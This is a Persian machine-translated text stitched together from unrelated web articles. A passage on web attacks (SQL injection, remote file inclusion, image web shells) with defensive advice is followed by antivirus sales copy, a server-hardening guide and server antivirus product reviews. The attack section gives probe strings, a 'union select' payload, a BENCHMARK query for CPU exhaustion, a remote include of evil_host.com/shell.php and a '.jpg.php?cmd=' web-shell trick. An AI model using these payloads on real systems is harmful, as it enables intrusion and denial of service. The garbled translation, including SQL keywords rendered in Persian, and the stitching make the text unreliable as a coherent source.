    این بیماری به این معنی است که یک پارامتر بررسی نشده در پرس و جوی SQL که در اسکریپت ظاهر می شود جایگزین می شود. هکر اسکریپت هایی را که از تزریق SQL رنج می برند به روشی ساده پیدا می کند، quote site.com/view.php?id=1" به مقدار پارامتر ارائه می شود، یا پارامتر عددی مانند این site.com/view.php؟ id=2-1.

    اگر نقل قول جایگزین باعث "خطا" شود (پیام های زیادی مبنی بر اینکه فلان درخواست در فلان اسکریپت در چنین مسیری اجرا نمی شود)، چنین اسکریپتی کاندیدای پمپاژ بیشتر آن است. اغلب، مهاجمان از هک گوگل استفاده می کنند و از موتور جستجو چیزی شبیه به این "سایت: www.victim.ru اخطار" می پرسند.موتور جستجوی گوگل اسکریپت های نادرستی را در سایت شما برمی گرداند، آنقدر قدیمی که مدت هاست توسط عنکبوت گوگل ایندکس شده اند. .

    کدی که مقدار را بررسی نمی کند و از تزریق SQL رنج می برد

    $id = $_REQUEST["id"];
    $result = mysql_query("انتخاب عنوان، متن، datenews، نویسنده FROM `news` WHERE `id`="$id"");

    حالا تصور کنید که به جای یک عدد، شما جایگزین "-1 union select null/*" (بدون نقل قول) شده و سپس درخواست شما به

    عنوان، متن، datenews، نویسنده را از «اخبار» انتخاب کنید WHERE `id`="-1 union null/*"

    یعنی هکر می خواهد درخواستش علاوه بر درخواست شما با استفاده از دایرکتیو اتحادیه با درخواست شما اجرا شود. و سپس هکر سعی می‌کند پرس‌وجوهای دیگری را انجام دهد و با توجه به قدرت زبان SQL، این امر برای مدیر خوب نیست. از deface (deface - جایگزینی صفحه شروع سایت) تا به دست آوردن حقوق ریشه روی سرور شما. یک هکر همچنین می تواند به لطف تزریق SQL یک حمله DoS انجام دهد: site.com/getnews.php?id=BENCHMARK(10000000,BENCHMARK(10000000, md5(تاریخ_تاریخ))) چند مورد از این درخواست ها و سرور در 100% CPU است. برای مدت طولانی بارگیری کنید.

    حفاظت از تزریق SQL:

    • از ویژگی های SQL Server مانند نماها و رویه های ذخیره شده به طور گسترده استفاده کنید. این امر دسترسی غیرمجاز به پایگاه داده را محدود می کند.
    • قبل از ارسال یک پارامتر به درخواست، باید از نظر نوع (برای PHP - is_bool()، is_float()، is_int()، is_string()، is_object()، is_array() و is_integer()) و حداقل ، با استفاده از ساختار نوع addslashes برای PHP نقل قول شده است.
    • همه اسکریپت ها با پایگاه داده از برخی از حساب های پایگاه داده کار می کنند، تمام امتیازات را از این حساب که برای کار لازم نیست حذف کنید. اغلب هکرها از دستور MySQL (MySQL به عنوان مثال در نظر گرفته می شود، این برای هر سرور SQL صدق می کند) "LOAD DATA INFILE" برای خواندن فایل های مورد نیاز خود از سرور و حساب قابل خواندنی که MySQL تحت آن اجرا می شود، استفاده می کنند. از این رو نتیجه، امتیازات غیر ضروری را برای اسکریپت های خود غیرفعال کنید، مانند FILE، که برای استفاده از دستور LOAD DATA INFILE لازم است. اصل «حداقل پایه» را باید مبنا قرار داد.
    • حساب سیستمی که سرور SQL تحت آن اجرا می شود نباید به صفحات سایت و فایل های سیستم سرور دسترسی داشته باشد.
  • اتصال فایل ها شامل فایل فرض کنید یک صفحه site.com/getnews.php?file=190607 وجود دارد، اما نویسنده اسکریپت با استفاده از include، صفحه را بدون چک وصل می کند.

    $file = $_REQUEST["پرونده"];
    include($file.".html");

    هکر به جای 190607 evil_host.com/shell.php را جایگزین می‌کند و سپس کل نوار آدرس مرورگر هکر مانند این site.com/postnews.php?file=evil_host.com/shell.php خواهد بود و هکر خواهد داشت. پوسته وب خودش در سایت شما با حقوقی که آپاچی دارد.

    حفاظت از اتصال فایل:

    • تمام پارامترهایی که کاربر وارد می کند و از طریق نوار آدرس به اسکریپت ارسال می شود را در اسکریپت های خود بررسی و فیلتر کنید. برای زبان برنامه نویسی خود، مطالبی را پیدا کنید که به شما یاد می دهد چگونه ایمن کدنویسی کنید.
    • هکرها واقعاً دوست دارند که زبان برنامه نویسی در سایت به شما اجازه اجرای دستورات سیستم را بدهد. بنابراین، اگر البته این امکان وجود دارد، باید فراخوانی چنین توابعی را در زبان برنامه نویسی خود ممنوع کنید. به عنوان مثال، در تنظیمات PHP می توان لیستی از توابع "ممنوع" را با استفاده از disable_functions در php.ini مشخص کرد.
  • تصویر تروجان
    اگر توانایی آپلود فایل ها روی سرور سایت را دارید، برای آپلود مثلاً تصاویر آواتار آماده باشید. در یک تصویر با فرمت JPEG مفهوم متادیتا وجود دارد (به یاد داشته باشید که دوربین در هنگام عکسبرداری از یک فریم اطلاعات را کجا می نویسد) و این ابرداده نوشته می شود.


    نام تصویر به avatara.jpg.php تغییر می کند تا اکثر بررسی های برنامه افزودنی را دور بزند و از site.com/upload_images/avatara.jpg.php?cmd=server_commands استفاده می کند.

    حفاظت از تروجان:

    • پسوند فایل را به درستی بررسی کنید. حتی اگر فایل های مجاز را به درستی پردازش می کنید، آماده باشید که تصویر از jpg به php با استفاده از آسیب پذیری دیگری در سایت خود تغییر نام دهد. متادیتا را در یک تصویر با توابعی مانند exif_read_data() در PHP بررسی کنید.
    • با استفاده از وب سرور خود از اجرای زبان های برنامه نویسی در فهرست های تصویری جلوگیری کنید. برای انجام این کار، به خطوط پیکربندی آپاچی مانند «AddType application/x-httpd-» نگاه کنید، که زبان های برنامه نویسی را با پسوند فایل مرتبط می کند و اجرای آنها را در فهرست های دارای تصاویر ممنوع می کند. برای آپاچی، منع اجرای فایل های زبان PHP یک ساختار خواهد بود


      دستور رد، اجازه
      انکار از همه

    • برای زبان برنامه نویسی خود، مطالبی را پیدا کنید که به شما یاد می دهد چگونه به صورت ایمن در هنگام پردازش تصاویر و آپلود صحیح آنها در سرور، کدنویسی کنید.

تشکر شخصی:

  • دوست الکساندر پوپیشف با نام مستعار سیاهگوش برای انتقاد و توصیه
  • سایت antichat.ru/
  • www.xakep.ru/
  • کتاب مایکل ایبن، برایان تایمن. مدیریت FreeBSD: هنر تعادل
  • کتاب جوئل اسکامبری، استوارت مک کلور، جورج کورتز. اسرار هکرها: امنیت شبکه - راه حل های آماده. ویرایش دوم

سایر منابع اطلاعات حفاظتی:

  • صفحه مرد امنیت مرد FreeBSD حاوی توضیحاتی در مورد مسائل امنیتی رایج و شیوه های مدیریت خوب است.
  • در لیست های پستی freebsd-security @ freebsd.org مشترک شوید. برای انجام این کار، یک ایمیل به majordomo @ freebsd.org با subscribe freebsd-security در متن پیام ارسال کنید. در این لیست پستی است که بیشتر مورد بحث قرار گرفته است مشکلات واقعیحفاظت.
  • صفحه اطلاعات امنیتی FreeBSD freebsd.org/security/
  • سند نحوه ارائه امنیت FreeBSD
  • وب سایت CERT.org حاوی اطلاعاتی در مورد آسیب پذیری ها ah در حفاظت از تمام سیستم عامل ها.
  • فایروال ها و امنیت اینترنت توسط ویلیام آر. چزویک و استیون ام. بلووین
  • ساخت فایروال های اینترنتی، ویرایش دوم توسط برنت چپمن و الیزابت زویکی

نتیجه:
امیدوارم این مقاله به شما کمک کرده باشد که همه مشکلات را با هم ببینید، اکنون مدیر باید در مورد امنیت رایانه، پایگاه های داده، سرورهای وب، زبان های برنامه نویسی از منابع اضافی مطالعه کند. اگر مقاله را به اختصار خلاصه کنیم، باید از اخبار مربوط به انتشار مشکلات امنیتی آگاه باشید، تمام داده های ورودی را برای صحت پیشرفت خود به روز کنید و بررسی کنید.
باشد که نیرو با شما باشد!

برای اینکه خدمات نرم افزاری این شرکت با موفقیت و بدون نقص کار کند، به نصب با کیفیت بالا و همچنین راه اندازی حفاظت ضد ویروس نیاز دارید. امروزه هیچ شرکتی نمی تواند بدون استفاده از اینترنت برای حسابداری، مکاتبات تجاری، گزارش دهی انجام دهد. سیستم CRM بسیار محبوب است، اما کیفیت کار آن به طور مستقیم به اتصال به شبکه جهانی بستگی دارد.

مزایای نصب نرم افزار ویروس

محصولات آنتی ویروس سطوح مختلفی از محافظت را ارائه می دهند. برنامه ها به جلوگیری از مشکلاتی مانند:

  • سرقت اطلاعات از طریق دسترسی از راه دور به سرور، از جمله ماهیت محرمانه (به عنوان مثال، داده ها برای دسترسی به حساب های شرکت).
  • معرفی برنامه های کاربردی مختلف کلاینت به سیستم عامل برای انجام حملات DDoS.
  • خرابی تجهیزات شرکت به دلیل اثرات مضر برنامه های مختلف؛
  • مسدود کردن، آسیب به برنامه ها و سرورهای لازم برای عملیات؛
  • سرقت، جعل یا تخریب داده های محرمانه.

به طور خلاصه، تنها یک نتیجه وجود خواهد داشت - معرفی یک پایگاه داده ضد ویروس به شرکت کمک می کند از ضررهای مالی بزرگ جلوگیری کند. علاوه بر این، این نه تنها برای جلوگیری از هک احتمالی سرور، بلکه برای حفظ عملکرد تجهیزات و سیستم های آنلاین پولی نیز صدق می کند. به همین دلیل است که موضوع راه اندازی حفاظت با کیفیت بالا و موثر همیشه برای مشاغل در هر اندازه مطرح است.

محبوب ترین نرم افزار برای نصب در دفتر

اغلب، مشتریان ترجیح می دهند نسخه های مختلف آنتی ویروس کسپرسکی را تنظیم کنند. محبوبیت این محصول نرم افزاری به دلیل ویژگی های زیر است:

  • تعداد زیادی گزینه برای مشاغل کوچک، متوسط ​​و بزرگ، یک خط جداگانه برای استفاده خانگی.
  • بسته های نرم افزاری کسپرسکی برای نصب نه تنها بر روی سرورهای اداری، بلکه برای نصب طراحی شده اند تلفن های همراه، لپ تاپ;
  • سرورهای کار مشترک، نامه، فایل های مختلف به طور قابل اعتماد توسط یک محصول ضد ویروس محافظت می شوند.
  • آنتی ویروس کسپرسکی با حملات به دروازه های اینترنتی مقابله می کند.
  • پیکربندی محصول تهدید داخلی حمله سرور را از بین می‌برد، زیرا متضمن تمایز حقوق کاربر است.

از دیگر مزایای نصب سیستم ضد ویروس مشخص شده می توان به پشتیبان گیری از اطلاعات، ذخیره رمز عبور و تکمیل خودکار فرم های اینترنتی در حالت امن، جلوگیری از ورود اسپم و فیشینگ به سرورها اشاره کرد. علاوه بر این، قیمت حفاظت توسط این محصولات بسیار مطلوب است. توسعه دهندگان آنتی ویروس کسپرسکی برای کاربرانی که در پیچیدگی های برنامه نویسی آشنایی کمی دارند، یک رابط کاربری راحت، ساده و قابل فهم ایجاد کرده اند.

هنگام انتخاب نرم افزار امنیتی به چه نکاتی توجه کنیم؟

  • نرم افزار خاص برای محافظت از کدام سرورها طراحی شده است: خانه، مشاغل کوچک و متوسط، شرکت های بزرگ.
  • وسعت پوشش برنامه های پیشنهادی سرورهای تجاری محلی؛
  • تداوم کار، فراوانی و شرایط به روز رسانی؛
  • امکان مدیریت متمرکز سیستم ضد ویروس؛
  • سازگاری محصول پیشنهادی با برنامه های تجاری نصب شده و سایر نرم افزارها.

نکته مهم نیز انتخاب شرکتی است که چنین محصولاتی را اجرا می کند. یک کارمند واجد شرایط در کوتاه ترین زمان ممکن کار درست را راه اندازی می کند و به مشتریان در مورد نحوه استفاده از ابزارهای برنامه هنگام کار با سرورها آموزش می دهد. هزینه ارائه چنین خدماتی نقش مهمی ایفا می کند - در شرکت ما همیشه بسیار سودآور است.

محافظت از سرور در برابر دسترسی خارجی یک بار برای همیشه غیرممکن است، زیرا هر روز آسیب پذیری های جدیدی کشف می شود و راه های جدیدی برای هک سرور ظاهر می شود. در این مقاله در مورد محافظت از سرورها در برابر دسترسی غیرمجاز صحبت خواهیم کرد.

سرورهای هر شرکتی دیر یا زود می توانند به هدفی برای هک یا حمله ویروس تبدیل شوند. به طور معمول، نتیجه چنین حمله ای از دست دادن داده ها، آسیب های اعتباری یا مالی است، بنابراین مسائل امنیتی سرور باید در وهله اول مورد توجه قرار گیرد.

باید درک کرد که محافظت در برابر هک سرور مجموعه ای از اقدامات است، از جمله اقداماتی که مستلزم نظارت مداوم بر عملکرد سرور و تلاش برای بهبود حفاظت است. محافظت از سرور در برابر دسترسی خارجی یک بار برای همیشه غیرممکن است، زیرا هر روز آسیب پذیری های جدیدی کشف می شود و راه های جدیدی برای هک سرور ظاهر می شود.

در این مقاله در مورد محافظت از سرورها در برابر دسترسی غیرمجاز صحبت خواهیم کرد.

راه ها و روش های محافظت از سرورها در برابر دسترسی غیرمجاز حفاظت فیزیکی سرور

حفاظت فیزیکی مطلوب است که سرور در یک مرکز داده امن، یک اتاق بسته و محافظت شده قرار گیرد، افراد خارجی نباید به سرور دسترسی داشته باشند.

احراز هویت SSH را تنظیم کنید

هنگام تنظیم دسترسی به سرور، از احراز هویت کلید SSH به جای رمز عبور استفاده کنید، زیرا شکستن چنین کلیدهایی با استفاده از جستجوی بی‌فوری بسیار دشوارتر است و گاهی اوقات به سادگی غیرممکن است.

اگر فکر می کنید که هنوز به رمز عبور نیاز دارید، حتماً تعداد تلاش برای وارد کردن آن را محدود کنید.

در صورت مشاهده چنین پیامی هنگام ورود توجه کنید:

آخرین ورود ناموفق: سه شنبه 28 سپتامبر 12:42:35 MSK 2017 از 52.15.194.10 در ssh:notty
از آخرین ورود موفق، 8243 تلاش برای ورود ناموفق وجود داشته است.

ممکن است نشان دهنده این باشد که سرور شما هک شده است. در این حالت، برای پیکربندی امنیت سرور، پورت SSH را تغییر دهید، لیست IP هایی را که دسترسی به سرور از طریق آنها امکان پذیر است را محدود کنید، یا نرم افزاری را نصب کنید که به طور خودکار فعالیت های بیش از حد مکرر و مشکوک را مسدود می کند.

به طور مرتب آخرین به روز رسانی ها را نصب کنید

برای اطمینان از محافظت از سرور، آخرین وصله ها و به روز رسانی های نرم افزار سروری را که استفاده می کنید - سیستم عامل، هایپروایزر، سرور پایگاه داده را به موقع نصب کنید.

توصیه می‌شود برای جلوگیری از حملاتی که از آسیب‌پذیری‌های روز صفر سوءاستفاده می‌کنند، هر روز وصله‌ها، به‌روزرسانی‌ها و اشکالات/آسیب‌پذیری‌های گزارش‌شده را بررسی کنید. برای انجام این کار، مشترک اخبار شرکت توسعه نرم افزار شوید، صفحات آن را در شبکه های اجتماعی دنبال کنید.

از رمزهای عبور محافظت کنید

یکی از رایج ترین راه های دسترسی به سرور، شکستن رمز عبور سرور است. بنابراین، توصیه های شناخته شده، اما با این وجود مرتبط را دنبال کنید تا سرور را بدون محافظت رها نکنید:

  • از رمزهای عبوری که به راحتی قابل حدس زدن هستند، مانند نام شرکت استفاده نکنید.
  • اگر هنوز از رمز عبور پیش‌فرض کنسول مدیریت استفاده می‌کنید، فوراً آن را تغییر دهید.
  • رمز عبور برای سرویس های مختلف باید متفاوت باشد.
  • اگر می خواهید رمز عبور خود را با شخصی به اشتراک بگذارید، هرگز آدرس IP، نام کاربری و رمز عبور خود را در همان ایمیل یا پیام پیام رسان ارسال نکنید.
  • می‌توانید تأیید صحت ۲ مرحله‌ای را برای ورود به حساب سرپرست تنظیم کنید.
دیواره آتش
  • مطمئن شوید که سرور دارای تنظیمات است، پیکربندی شده است و همیشه در حال اجرا است.
  • از ترافیک ورودی و خروجی محافظت کنید.
  • پیگیری کنید که چه پورت هایی باز هستند و برای چه هدفی باز هستند، برای کاهش تعداد آسیب پذیری های احتمالی برای هک سرور، هیچ چیز غیر ضروری را باز نکنید.

به طور خاص، فایروال برای محافظت از سرور در برابر حملات ddos ​​بسیار مفید است، زیرا می‌توانید به سرعت قوانین مسدودکننده فایروال را ایجاد کنید و آدرس‌های IP را که حمله از آن‌ها انجام می‌شود اضافه کنید، یا با استفاده از پروتکل‌های خاص دسترسی به برنامه‌های خاص را مسدود کنید.

مانیتورینگ و تشخیص نفوذ
  • نرم افزار و سرویس های در حال اجرا بر روی سرور خود را محدود کنید. به طور دوره ای همه چیزهایی را که در حال اجرا هستید بررسی کنید و اگر فرآیندهای ناآشنا یافت شد، فوراً آنها را حذف کنید و شروع به بررسی ویروس کنید.
  • به طور دوره ای علائم دستکاری را بررسی کنید. هک ممکن است توسط حساب‌های کاربری جدیدی که شما فایلی را ایجاد، انتقال یا حذف نکرده‌اید، نشان دهد /etc/syslog.conf، فایل های حذف شده /etc/shadowو /etc/passwrd.
  • سرور خود را زیر نظر داشته باشید، سرعت و توان عملیاتی معمولی آن را زیر نظر داشته باشید تا بتوانید متوجه انحرافات شوید، برای مثال زمانی که بار روی سرور بسیار بیشتر از حد معمول شده است.
با استفاده از رمزگذاری VPN و SSL/TLS

اگر دسترسی از راه دور به سرور مورد نیاز است، باید فقط از آدرس های IP خاصی مجاز باشد و از طریق VPN انجام شود.

گام بعدی در تضمین امنیت می‌تواند راه‌اندازی SSL باشد که نه تنها داده‌ها را رمزگذاری می‌کند، بلکه هویت سایر شرکت‌کنندگان در زیرساخت شبکه را با صدور گواهی‌های مناسب برای آنها تأیید می‌کند.

بررسی امنیت سرور

این ایده خوبی است که به طور مستقل امنیت سرور را با استفاده از روش pentest بررسی کنید. شبیه سازی حمله برای یافتن آسیب پذیری های احتمالی و از بین بردن آنها به موقع. توصیه می شود متخصصان را در این امر مشارکت دهید امنیت اطلاعاتبا این حال، برخی از تست ها را می توان به طور مستقل با استفاده از برنامه های هک سرور انجام داد.

چه چیز دیگری غیر از هک سرورها را تهدید می کند

یک سرور به دلایلی غیر از هک شدن ممکن است از کار بیفتد. به عنوان مثال، ممکن است یک عفونت بدافزار یا فقط نقص فیزیکی یکی از اجزا باشد.

بنابراین، اقدامات برای محافظت از سرور باید شامل موارد زیر باشد:

  • نصب و به روز رسانی برنامه های محافظت از سرور - آنتی ویروس ها.
  • کپی های رمزگذاری شده منظم از داده ها حداقل هفته ای یکبار، زیرا طبق آمار، هارد دیسک های سرور از نظر فراوانی خرابی در رتبه اول قرار دارند. اطمینان حاصل کنید که نسخه پشتیبان در یک محیط امن فیزیکی ذخیره شده است.
  • اطمینان از تامین برق بدون وقفه اتاق سرور.
  • پیشگیری فیزیکی به موقع سرورها از جمله پاکسازی آنها از گرد و غبار و تعویض خمیر حرارتی.

تجربه متخصصان اینتگروس به ما می گوید که بهترین محافظت در برابر این گونه تهدیدات، استفاده از بهترین روش ها در زمینه سیستم های حفاظت از سرور است.

برای اطمینان از امنیت سرورهای مشتریان، ما از ترکیبی از ابزارها استفاده می کنیم: فایروال ها، آنتی ویروس ها، فناوری های امنیت / مدیریت رویداد (SIM / SEM)، فناوری های تشخیص نفوذ / حفاظت (IDS / IPS)، فناوری های تجزیه و تحلیل رفتاری شبکه (NBA) البته سرورهای نگهداری پیشگیرانه منظم و ترتیب اتاق های سرور امن به صورت کلید در دست. این به شما امکان می دهد خطرات هک یا خرابی سرور را به دلایل دیگر به حداقل برسانید.

ما آماده انجام ممیزی امنیتی سرورهای شرکت شما، مشاوره با متخصصان، انجام انواع کارها در زمینه راه اندازی حفاظت از تجهیزات سرور هستیم.

سرور یک رایانه تخصصی است که اقدامات روی آن بدون مشارکت فعال کاربر انجام می شود. معمولا یک سرویس وجود دارد نرم افزاربرای انجام وظایف خاص از طریق چنین رایانه ای، داده ها رد و بدل می شوند، اقدامات راه اندازی می شوند، محاسبات ریاضی انجام می شوند و بسیاری موارد دیگر. همه سرورها در انواع متفاوت هستند، به عنوان مثال، سرورهای بازی، وب، ایمیل و پروکسی وجود دارد. هر یک از این دستگاه ها یک کار مشخص را انجام می دهد. اغلب، برای عملکرد ایمن چنین ماشینی، یک آنتی ویروس بر روی آن نصب می شود، بنابراین مایلیم در مورد چنین نرم افزارهایی بیشتر به شما بگوییم و چند راه حل خاص را برجسته کنیم.

پلتفرم: ویندوز سرور

شرکت معروف آنتی ویروس Avast یک اسمبلی به طور خاص برای سرورها منتشر می کند و ابزارهای مفید دیگری را ارائه می دهد. به عنوان مثال، به تابع نگاه کنید "تخریب داده ها". این به گونه ای پیاده سازی شده است که اطلاعات تولید شده به طور تصادفی را در تمام داده های حذف شده بازنویسی می کند، که اجازه ایجاد مجدد حالت اصلی فایل را در هنگام تلاش برای بازیابی آن نمی دهد. علاوه بر این، وجود دارد "تحلیل رفتار"- ابزاری که مسئول اسکن برنامه های کاری برای فعالیت های مشکوک است. اگر Notepad سعی کند به همان وب کم دسترسی پیدا کند، چنین درخواستی بلافاصله مسدود می شود. البته، چنین مثالی ساده است، اما عملکرد در سطح بالاتری کار می کند.

Avast Business Antivirus Pro همچنین دارای فایروال داخلی، اسکن هوشمند، حفاظت از هرزنامه، محافظت از رمز عبور و ورود آسان تر به حساب کاربری است. همچنین مقایسه دائمی تهدیدات احتمالی با پایگاه داده ویروس فعلی با استفاده از فناوری دفاع نرم افزار وجود دارد. این به شما امکان می دهد فقط با داده های تأیید شده تعامل داشته باشید. به نوبه خود، ابزار CyberCapture اشیاء مشکوک را به آزمایشگاه تهدید ارسال می کند.

سرور آنتی ویروس آویرا

پلتفرم: ویندوز سرور

Avira Antivirus Server یک راه حل ویژه از شرکت توسعه دهنده برای سرورهای دارای سیستم عامل ویندوز است. سازندگان حداکثر وعده را می دهند کار کارآمدبا مصرف کم منابع سیستم، نرخ تشخیص تهدید بالا و سهولت استفاده. اسمبلی ابزارهایی را برای محافظت در هنگام دسترسی اضافه کرده است، به این معنی که فرآیندهای در حال اجرا را در زمانی که برنامه های کاربردی دیگر به آنها دسترسی دارند، نظارت می کند. اسکن دستی نیز وجود دارد که به شما امکان می‌دهد تحلیل رسانه مشخص شده یا یک فهرست جداگانه را در هر زمان شروع کنید.

یک بار دیگر یادآور می‌شویم که توسعه‌دهنده تاکید خاصی بر مصرف کم منابع رایانه شخصی و سهولت مدیریت آنتی ویروس دارد. نوآوری های رایگان مداوم و به روز رسانی پایگاه داده ویروس نیز وعده داده شده است. اگر علاقه مند به آشنایی با این محصول هستید، می توانید با پر کردن فرم مربوطه، نسخه رایگان آن را به مدت 30 روز در وب سایت رسمی دریافت کنید. در طول آزمایش، تمام ابزارها و عملکردها و همچنین تماس رایگان با خدمات پشتیبانی در دسترس خواهند بود.

امنیت فایل ESET

ESET File Security برای اجرا بر روی سرورهای ویندوز و لینوکس طراحی شده است و به لطف مولفه اضافی جعبه ایمنی ESET Dynamic Threat Defense، محافظت چند لایه ای را ارائه می دهد. سیستم حفاظتی مبتنی بر ابر به طور خودکار در برابر تهدیدات جدید بدون انتظار برای به‌روزرسانی موتور شناسایی محافظت می‌کند (متوسط ​​زمان به‌روزرسانی مشخص شده ۲۰ دقیقه است). حفاظت داخلی حمله شبکه آسیب‌پذیری‌های شناخته شده را در سطح شبکه شناسایی می‌کند و هنگام استفاده از OneDrive، موتور Office 365 OneDrive Storage آن را اسکن می‌کند. همچنین باید به جلوگیری از نفوذ بات نت ها توجه شود. این ابزار نه تنها یک اتصال مخرب را پیدا می کند، بلکه فرآیندهای مشابه را نیز شناسایی می کند و بلافاصله فعالیت خطرناک را مسدود می کند و کاربر را در مورد آن آگاه می کند.

برای مدیریت ESET File Security، از کاربر خواسته می‌شود کنسول را روی ویندوز یا لینوکس نصب کند و یک دستگاه واردات مجازی برای ساده‌سازی تنظیمات وجود دارد. شما می توانید با تمامی قابلیت های این آنتی ویروس آشنا شوید، نسخه رایگان آن را امتحان کنید و نسخه کامل آن را در وب سایت رسمی توسعه دهندگان خریداری کنید.

امنیت کسپرسکی

پلتفرم: ویندوز سرور، لینوکس

Kaspersky Security برای سرورها در مجموعه ها گنجانده شده است - Total، Endpoint Security for Business، Kaspersky Security برای Virtual and Cloud Environments، و Kaspersky Security برای سیستم های ذخیره سازی. با خرید یکی از این نسخه ها، از سرور خود محافظت مطمئنی دریافت می کنید جدیدترین نسلبد افزار. نرم افزار مورد بحث دارای حفاظت پیشرفته سرور است و محافظت در برابر سوء استفاده ها، محافظت از سرورهای ترمینال، نظارت بر ترافیک خارجی، یکپارچگی سیستم و محافظت مداوم از سیستم های ذخیره سازی داده ها با استفاده از یک ابزار چند سطحی را فراهم می کند. سیستم‌های داخلی مدیریت حقوق سرپرست مدیریت، اعلان‌ها و همچنین ادغام با سیستم‌های SIEM و مدیریت فایروال ویندوز را آسان می‌کنند.

من می خواهم توجه داشته باشم که Kaspersky Security جداگانه است سیستم مورد نیازبرای پلتفرم های ذخیره سازی خاص، به عنوان مثال، برای NetApp - Clustered Data ONTAP 8.x و 9.x و Data ONTAP 7.x و 8.x در حالت 7 حالته، و برای EMC Isilon - IBM System Storage سری N. هنگام دانلود آنتی ویروس در وب سایت کسپرسکی، می توانید با لیست تمام الزامات آشنا شوید.

McAfee VirusScan Enterprise

پلتفرم: ویندوز سرور، لینوکس

پیش از این، کاربران McAfee Endpoint Security را روی سرورهای خود نصب می کردند، اما توسعه دهندگان تصمیم گرفتند این محصول را با تغییر بیشتر در نام آن بهبود بخشند. اکنون VirusScan Enterprise است. به هر کسی که قبلاً از این آنتی ویروس استفاده کرده باشد، یک مهاجرت رایگان ارائه می شود. وب سایت رسمی تمام دستورالعمل ها و درس های لازم را در مورد این موضوع ارائه می دهد. به جعبه ابزار اصلی نسخه جدیدشامل: فایروال، کنترل های وب برای ارتباطات تهدید، آنتی ویروس اجباری، و گزینه های پیشگیری از سوء استفاده.

McAfee VirusScan Enterprise از و روش های مدرنفراگیری ماشین. چنین فناوری هایی تشخیص کدهای مخرب را از طریق ویژگی های استاتیک و رفتاری ممکن می سازند. بدافزار به محض ورود به سیستم محتوی می شود و از آلوده کردن سایر فرآیندها جلوگیری می کند. فناوری Endpoint Detection and Tesponse مسئول تشخیص و پاسخگویی نقطه پایانی است - این به شما امکان می دهد با یک کلیک به تهدیدات پاسخ دهید.

آنتی ویروس کومودو برای لینوکس

پلتفرم: لینوکس

توسعه دهندگان آنتی ویروس کومودو نسخه جداگانه ای را برای سیستم عامل های مبتنی بر هسته لینوکس ارائه کرده اند. این برنامه توسط اکثر توزیع‌ها، هم 32 بیتی و هم 64 بیتی پشتیبانی می‌شود. از ویژگی‌ها، می‌خواهم فوراً به فیلتر ایمیل اشاره کنم که با عوامل ایمیل محبوب سازگار است: Postfix، Qmail، Sendmail و Exim MTA. سازنده تضمین می کند که حفاظت در زمان واقعی قابل اعتماد، سهولت نصب و بدون مراحل پیکربندی پیچیده را تضمین می کند. سیستم ضد هرزنامه را می توان به طور کامل به صورت دستی ویرایش کرد، اما تنظیمات استاندارد را فراهم می کند فیلتراسیون خوب. اگر کاربر بخواهد کنترل بیشتری بر روی فایل ها داشته باشد، یک تابع برای فعال کردن در دسترس است "تحلیل رفتار در زمان واقعی". تمام اشیاء مشکوک به سرور تجزیه و تحلیل رفتار ابری ارسال می شود.

برای استفاده راحت از آنتی ویروس کومودو، به یک کامپیوتر پرقدرت با حداقل فرکانس پردازنده 2 گیگاهرتز و 2 گیگابایت رم رایگان نیاز دارید. لازم نیست نگران اجرای اسکن باشید: فقط یک بار پیکربندی طرح آنها کافی است و در آینده به طور خودکار راه اندازی می شوند. شروع تجزیه و تحلیل در هر زمان مناسب با فشار دادن یک دکمه امکان پذیر است. آنتی ویروس مورد نظر منبع باز است، به صورت رایگان توزیع شده و از وب سایت رسمی دانلود می شود.

Chkrootkit

پلتفرم: لینوکس

Chkrootkit (Check Rootkit) برنامه ای است که به طور گسترده توسط مدیران سیستم برای محافظت از سیستم عامل در برابر روت کیت های شناخته شده استفاده می شود. روت کیت مجموعه ای از مؤلفه ها مانند اسکریپت ها، فایل های اجرایی یا فایل های پیکربندی است که عملکرد پوشاندن، کنترل و جمع آوری داده ها را انجام می دهند. با کمک چنین ابزارهایی، مهاجمان به سیستم عامل نفوذ می کنند و تمام اطلاعات لازم را به دست می آورند. نرم افزار ذکر شده در بالا فقط برای محافظت از رایانه در برابر این نوع فعالیت ها طراحی شده است. Chkrootkit نیازی به نصب ندارد و می توان آن را از روی یک سی دی زنده اجرا کرد. کار در آن از طریق هر کنسول راحت انجام می شود و مدیریت حتی برای یک کاربر بی تجربه واضح است.

Chkrootkit بسیار سریع کار می کند، کار خود را به خوبی انجام می دهد، فضای زیادی را در درایو اشغال نمی کند، اما در عین حال دارای تعداد زیادی ماژول برای هر نوع کاربر است. در وب سایت رسمی، مجموعه هایی از برنامه در پسوندهای مختلف وجود دارد و دانلود از یک منبع مستقیم یا چندین آینه در دسترس است.

شما با راه حل های آنتی ویروس آشنا شده اید که تبدیل خواهند شد بهترین راه حلبرای انواع مختلفسرورها همانطور که می بینید، هر نرم افزار ویژگی های خاص خود را دارد، بنابراین در شرایط خاص بیشترین کاربرد را خواهد داشت.

نحوه سازماندهی صحیح دفاع از شبکه های کامپیوتری در برابر بدافزارها.

مقاله خطاب به مدیران سیستم مبتدی است.

منظور من از محافظت از آنتی ویروس، محافظت در برابر هر نوع بدافزار است: ویروس ها، تروجان ها، کیت های روت، درهای پشتی و …

1 مرحله حفاظت از آنتی ویروس - نرم افزار ضد ویروس را روی هر رایانه موجود در شبکه نصب کنید و حداقل روزانه آن را به روز کنید. طرح درستبه روز رسانی پایگاه داده های آنتی ویروس: 1-2 سرور برای به روز رسانی می روند و به روز رسانی را در تمام رایانه های موجود در شبکه توزیع می کنند. برای غیرفعال کردن حفاظت، حتما رمز عبور تعیین کنید.

نرم افزار آنتی ویروس معایب زیادی دارد. اشکال اصلی این است که آنها ویروس هایی را که سفارشی نوشته شده اند و به طور گسترده مورد استفاده قرار نمی گیرند، نمی گیرند. ایراد دوم این است که آنها پردازنده را بارگذاری می کنند و حافظه را روی رایانه می گیرند، برخی بیشتر (کسپرسکی) و برخی کمتر (Eset Nod32) ، این باید در نظر گرفته شود.

نصب نرم افزار آنتی ویروس یک راه اجباری اما ناکافی برای محافظت در برابر شیوع ویروس است، اغلب یک امضای ویروس در پایگاه داده های آنتی ویروس روز بعد پس از توزیع آن ظاهر می شود، در 1 روز یک ویروس می تواند عملکرد هر شبکه رایانه ای را فلج کند.

معمولا، مدیران سیستم در مرحله 1 متوقف می شوند، بدتر از آن، آنها آن را کامل نمی کنند یا به روز رسانی ها را دنبال نمی کنند، و دیر یا زود عفونت هنوز رخ می دهد. در زیر سایر مراحل مهم برای تقویت حفاظت ضد ویروس را فهرست خواهم کرد.

